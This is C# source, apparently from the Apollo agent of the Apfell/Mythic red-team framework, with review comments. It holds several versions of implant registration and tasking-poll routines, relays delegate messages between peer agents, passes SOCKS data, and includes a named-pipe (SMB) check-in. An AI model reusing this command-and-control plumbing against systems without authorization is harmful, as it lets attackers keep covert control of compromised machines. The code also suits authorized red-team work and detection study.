/// <summary>
/// Registers the agent with the Apfell server and adopts the UUID the server assigns.
/// </summary>
/// <param name="agent">Agent object that is serialized to JSON and sent as the registration message.</param>
/// <returns>
/// The "id" value taken from the server reply, or an empty string when <c>Send</c> reports failure.
/// </returns>
/// <exception cref="Exception">The reply does not contain the text "success".</exception>
override public string RegisterAgent(Apollo.Agent agent)
{
    DebugWriteLine("Attempting to serialize agent...");
    string payload = JsonConvert.SerializeObject(agent);
    // The full serialized agent is written to the debug log here.
    DebugWriteLine($"[+] InitializeImplant - Sending {payload}");

    // A fresh GUID tags the request; the reply is fetched from the inbox under the same tag.
    string messageId = Guid.NewGuid().ToString();
    if (!Send(messageId, payload))
    {
        return "";
    }
    DebugWriteLine("Successfuly sent registration message!");

    string reply = (string)Inbox.GetMessage(messageId);
    // NOTE(review): this is a substring test on the raw reply, not a check of the parsed
    // "status" field, and the reply is dereferenced without a null check.
    if (!reply.Contains("success"))
    {
        throw (new Exception("Failed to retrieve an ID for new callback."));
    }

    // Expected reply shape: { "status": "success", "id": <id> }
    JObject parsedReply = (JObject)JsonConvert.DeserializeObject(reply);
    string assignedUuid = parsedReply.Value<string>("id");
    cryptor.UpdateUUID(assignedUuid);
    return assignedUuid;
}
/// <summary>
/// Sends the serialized agent as a registration message and, on a "success" reply,
/// switches the cryptor to the UUID returned by the server.
/// </summary>
/// <param name="agent">Agent object serialized to JSON for the registration message.</param>
/// <returns>
/// The "id" value from the reply, or an empty string when the reply does not contain "success".
/// </returns>
/// <exception cref="Exception">Thrown when <c>Send</c> returns false.</exception>
public override string RegisterAgent(Apollo.Agent agent)
{
    string payload = JsonConvert.SerializeObject(agent);
    string messageId = Guid.NewGuid().ToString();

    DebugWriteLine($"Sending registration message with ID {messageId}...");
    if (!Send(messageId, payload))
    {
        // NOTE(review): the message talks about retrieving an ID, but this branch is the
        // send failure; a non-success reply further down returns "" instead of throwing.
        throw (new Exception("Failed to retrieve an ID for new callback."));
    }

    DebugWriteLine($"SUCCESS! Sent registration message with ID {messageId}");
    DebugWriteLine($"Waiting for reply to registration message with ID {messageId}...");
    string reply = (string)Inbox.GetMessage(messageId);
    DebugWriteLine($"SUCCESS! Got reply to registration message with ID {messageId}...");

    // Substring test on the raw reply text; the "status" field itself is not inspected.
    if (!reply.Contains("success"))
    {
        return "";
    }

    // Expected reply shape: { "status": "success", "id": <id> }
    JObject parsedReply = (JObject)JsonConvert.DeserializeObject(reply);
    string assignedUuid = parsedReply.Value<string>("id");
    cryptor.UpdateUUID(assignedUuid);
    return assignedUuid;
}
/// <summary>
/// Deserializes the current tasking message and repackages its tasks and delegate
/// messages into a <c>Structs.TaskQueue</c>.
/// </summary>
/// <param name="agent">Not read by this implementation.</param>
/// <returns>A queue whose Tasks and Delegates arrays hold everything found in the response.</returns>
public override Structs.TaskQueue GetMessages(Apollo.Agent agent)
{
    List<Task> tasks = new List<Task>();
    List<Structs.DelegateMessage> delegateMessages = new List<Structs.DelegateMessage>();

    string rawTasking = GetTaskingMessage();
    Structs.CheckTaskingResponse response =
        JsonConvert.DeserializeObject<Structs.CheckTaskingResponse>(rawTasking);

    // NOTE(review): response and response.tasks are used without a null check,
    // unlike response.delegates below.
    foreach (Task incoming in response.tasks)
    {
        Debug.WriteLine("[-] CheckTasking - NEW TASK with ID: " + incoming.id);
        tasks.Add(incoming);
    }

    if (response.delegates != null)
    {
        // Each dictionary is flattened: every key/value pair becomes one DelegateMessage.
        foreach (Dictionary<string, string> bundle in response.delegates)
        {
            foreach (KeyValuePair<string, string> entry in bundle)
            {
                Structs.DelegateMessage message = new Structs.DelegateMessage()
                {
                    UUID = entry.Key,
                    Message = entry.Value
                };
                delegateMessages.Add(message);
            }
        }
    }

    return new Structs.TaskQueue()
    {
        Tasks = tasks.ToArray(),
        Delegates = delegateMessages.ToArray()
    };
}
/// <summary>
/// Sends a "get_tasking" request (with any queued delegate messages attached) and
/// converts the reply into a <c>Structs.TaskQueue</c>.
/// </summary>
/// <param name="agent">Not read by this implementation.</param>
/// <returns>
/// A queue holding the tasks and delegate messages from the reply; both arrays are empty
/// when <c>Send</c> returns false.
/// </returns>
public override Structs.TaskQueue GetMessages(Apollo.Agent agent)
{
    List<Task> tasks = new List<Task>();
    List<Structs.DelegateMessage> delegateMessages = new List<Structs.DelegateMessage>();

    Structs.CheckTaskingRequest request = new Structs.CheckTaskingRequest()
    {
        action = "get_tasking",
        tasking_size = 1
    };

    if (DelegateMessageRequestQueue.Count > 0)
    {
        // Drain the outbound delegate queue into this request while holding the mutex.
        // NOTE(review): the Count test happens before the mutex is taken, and the release
        // is not in a finally block.
        DelegateMessageRequestMutex.WaitOne();
        req_delegates_copy:
        request.delegates = DelegateMessageRequestQueue.ToArray();
        DelegateMessageRequestQueue.Clear();
        DelegateMessageRequestMutex.ReleaseMutex();
    }

    string body = JsonConvert.SerializeObject(request);
    string requestId = Guid.NewGuid().ToString();

    if (Send(requestId, body))
    {
        // The reply is looked up in the inbox under the same GUID used for the request.
        string rawReply = (string)Inbox.GetMessage(requestId);
        Mythic.Structs.CheckTaskingResponse reply =
            JsonConvert.DeserializeObject<Mythic.Structs.CheckTaskingResponse>(rawReply);

        foreach (Task incoming in reply.tasks)
        {
            Debug.WriteLine("[-] CheckTasking - NEW TASK with ID: " + incoming.id);
            tasks.Add(incoming);
        }

        if (reply.delegates != null)
        {
            // Each dictionary is flattened: every key/value pair becomes one DelegateMessage.
            foreach (Dictionary<string, string> bundle in reply.delegates)
            {
                foreach (KeyValuePair<string, string> entry in bundle)
                {
                    Structs.DelegateMessage message = new Structs.DelegateMessage()
                    {
                        UUID = entry.Key,
                        Message = entry.Value
                    };
                    delegateMessages.Add(message);
                }
            }
        }
    }

    return new Structs.TaskQueue()
    {
        Tasks = tasks.ToArray(),
        Delegates = delegateMessages.ToArray()
    };
}
/// <summary>
/// Retrieves the pending message queue for an agent. Each concrete profile supplies
/// its own transport-specific implementation.
/// </summary>
/// <param name="agent">The agent on whose behalf messages are requested.</param>
/// <returns>A <c>Structs.TaskQueue</c> built by the implementing profile.</returns>
public abstract Structs.TaskQueue GetMessages(Apollo.Agent agent);
//public abstract string PostResponse(Structs.DownloadFileRegistrationMessage taskresp);

/// <summary>
/// Registers an agent through the implementing profile's transport.
/// </summary>
/// <param name="agent">The agent to register.</param>
/// <returns>
/// A string produced by the implementing profile; the implementations shown with this
/// declaration return the agent UUID, or an empty string on some failure paths.
/// </returns>
public abstract string RegisterAgent(Apollo.Agent agent);
/// <summary>
/// Polls the Apfell endpoint with a "get_tasking" request and collects the tasks,
/// delegate messages and SOCKS datagrams found in the reply.
/// </summary>
/// <param name="agent">Not read by this implementation.</param>
/// <returns>
/// A <c>TaskQueue</c> with Tasks and Delegates always set (possibly empty) and
/// SocksDatagrams set only when the reply carries a non-null socks field.
/// </returns>
override public Mythic.Structs.TaskQueue GetMessages(Apollo.Agent agent)
{
    // The SOCKS send step this timer was written for is disabled, so the first
    // measurement covers no work; the debug line is still emitted.
    Stopwatch timer = Stopwatch.StartNew();
    timer.Stop();
    DebugWriteLine($"SendSocksDatagrams took {Utils.StringUtils.FormatTimespan(timer.Elapsed)} to run.");
    timer.Restart();

    TaskQueue response = new TaskQueue();
    List<Task> tasks = new List<Task>();
    List<DelegateMessage> delegateMessages = new List<DelegateMessage>();

    CheckTaskingRequest request = new CheckTaskingRequest()
    {
        action = "get_tasking",
        tasking_size = -1
    };

    if (DelegateMessageRequestQueue.Count > 0)
    {
        // Drain the outbound delegate queue into this request while holding the mutex.
        // NOTE(review): the Count test happens before the mutex is taken, and the release
        // is not in a finally block.
        DelegateMessageRequestMutex.WaitOne();
        request.delegates = DelegateMessageRequestQueue.ToArray();
        DelegateMessageRequestQueue.Clear();
        DelegateMessageRequestMutex.ReleaseMutex();
    }
    else
    {
        // Nothing queued: send an explicit empty array.
        request.delegates = new Dictionary<string, string>[0];
    }

    string body = JsonConvert.SerializeObject(request);
    string requestId = Guid.NewGuid().ToString();

    if (Send(requestId, body))
    {
        // The reply is looked up in the inbox under the same GUID used for the request.
        string rawReply = (string)Inbox.GetMessage(requestId);
        Mythic.Structs.CheckTaskingResponse reply =
            JsonConvert.DeserializeObject<Mythic.Structs.CheckTaskingResponse>(rawReply);

        if (reply.tasks != null)
        {
            foreach (Task incoming in reply.tasks)
            {
                Debug.WriteLine("[-] CheckTasking - NEW TASK with ID: " + incoming.id);
                tasks.Add(incoming);
            }
        }

        if (reply.delegates != null)
        {
            // Only the first key of each dictionary is used; an empty dictionary makes First() throw.
            foreach (Dictionary<string, string> bundle in reply.delegates)
            {
                string targetUuid = bundle.Keys.First();
                DelegateMessage message = new DelegateMessage()
                {
                    UUID = targetUuid,
                    Message = bundle[targetUuid]
                };
                delegateMessages.Add(message);
            }
        }

        if (reply.socks != null)
        {
            response.SocksDatagrams = reply.socks;
        }
    }

    response.Delegates = delegateMessages.ToArray();
    response.Tasks = tasks.ToArray();

    timer.Stop();
    DebugWriteLine($"Get tasking took {Utils.StringUtils.FormatTimespan(timer.Elapsed)} to run.");
    return response;
}
/// <summary>
/// Not supported by this profile; every call throws.
/// </summary>
/// <param name="agent">Unused.</param>
/// <exception cref="NotImplementedException">Always thrown.</exception>
public override Mythic.Structs.TaskQueue GetMessages(Apollo.Agent agent)
    => throw new NotImplementedException();
/// <summary>
/// Registers the agent over the pipe connection held in <c>serverStream</c>: waits for a
/// peer to connect, announces the current UUID and, when that UUID is still the payload
/// UUID, performs the full registration exchange and adopts the UUID from the reply.
/// </summary>
/// <param name="agent">Agent object serialized to JSON, encrypted and sent as the "register" payload.</param>
/// <returns>
/// The UUID from the checkin reply after a staged registration; the current UUID when the
/// agent already has one; an empty string when sending the "register" message fails.
/// </returns>
/// <exception cref="Exception">The checkin reply does not contain the text "success".</exception>
public override string RegisterAgent(Apollo.Agent agent)
{
    // Serialize the agent, encrypt it with the profile's cryptor, and take the UTF-8 bytes.
    string json = JsonConvert.SerializeObject(agent);
    byte[] reqPayload = Encoding.UTF8.GetBytes(base.cryptor.Encrypt(json));
    // A connection left over from an earlier call is closed and the pipe server recreated.
    if (holdConnection)
    {
        serverStream.Close();
        serverStream = CreateNamedPipeServer();
        holdConnection = false;
    }
    // Presumably blocks until a peer connects (serverStream's type is not shown here).
    // NOTE(review): from a defender's view, the pipe creation and the inbound connection
    // are the events that named-pipe telemetry records for this step.
    serverStream.WaitForConnection();
    holdConnection = true;
    // Background reader; judging by its name it sorts inbound messages for Inbox - confirm.
    Thread t = new Thread(() => ReadAndSortMessages());
    t.Start();
    SMBMessage uuidRegistration = new SMBMessage()
    {
        MessageType = "uuid_registration",
        MessageObject = base.cryptor.GetUUIDBytes()
    };
    // This is the payload uuid, so we need to stage and get the new one
    if (base.cryptor.GetUUIDString() == baseUUID)
    {
        //uuidRegistration.MessageType = "staging_uuid_registration";
        // The announcement carries "staging-" + UUID instead of the raw UUID bytes.
        uuidRegistration.MessageObject = Encoding.UTF8.GetBytes("staging-" + base.cryptor.GetUUIDString());
        SMBMessage registerMsg = new SMBMessage()
        {
            MessageType = "register",
            MessageObject = reqPayload
        };
        //string result = Send(registrationId, registerMsg);
        string result;
        DebugWriteLine($"Sending uuid_registration message to client...");
        // The return value of this Send is not checked.
        Send(uuidRegistration);
        DebugWriteLine($"SUCCESS! Sent uuid_registration message!");
        DebugWriteLine($"Sending Apfell registration message to client...");
        if (Send(registerMsg))
        {
            DebugWriteLine($"SUCCESS! Sent Apfell registration message!");
            DebugWriteLine($"Waiting for initial checkin response from Apfell server...");
            // The reply is fetched under the fixed key "checkin" rather than a per-request ID.
            result = (string)Inbox.GetMessage("checkin");
            DebugWriteLine($"SUCCESS! Got initial checkin response from Apfell server!\n\t{result}");
            // Substring test on the raw reply text; the "status" field itself is not inspected.
            if (result.Contains("success"))
            {
                // If it was successful, initialize implant
                // Response is { "status": "success", "id": <id> }
                JObject resultJSON = (JObject)JsonConvert.DeserializeObject(result);
                string newUUID = resultJSON.Value<string>("id");
                base.cryptor.UpdateUUID(newUUID);
                // Announce the newly assigned UUID to the connected peer.
                SMBMessage notifyRelayMessage = new SMBMessage()
                {
                    MessageType = "uuid_registration",
                    MessageObject = Encoding.UTF8.GetBytes(newUUID)
                };
                // Do something with bool?
                Send(notifyRelayMessage);
                return(newUUID);
            }
            else
            {
                throw (new Exception("Failed to retrieve an ID for new callback."));
            }
        }
        // Sending the "register" message failed.
        return("");
    }
    else
    {
        // we've already got an agent uuid, return that.
        Send(uuidRegistration);
        return(base.cryptor.GetUUIDString());
    }
}